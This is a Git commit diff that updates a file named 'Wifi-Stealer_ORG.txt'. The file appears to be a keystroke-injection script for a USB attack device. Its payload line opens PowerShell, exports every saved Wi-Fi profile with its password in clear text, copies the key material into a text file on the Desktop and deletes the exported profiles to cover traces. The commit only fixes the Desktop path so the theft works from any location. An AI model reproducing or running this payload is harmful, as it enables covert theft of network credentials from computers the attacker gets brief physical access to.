Update Wifi-Stealer_ORG.txt

On my PC it does open in powershell location. I use power toys overlay for Run. This will redirect to the desktop from anywhere
This commit is contained in:
jasniec 2022-07-25 20:31:52 +02:00 committed by GitHub
parent de40b7fbff
commit 6c977513e6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -9,5 +9,5 @@ DELAY 500
STRING powershell STRING powershell
ENTER ENTER
DELAY 500 DELAY 500
STRING cd Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit STRING cd C:\Users\$env:UserName\Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
ENTER ENTER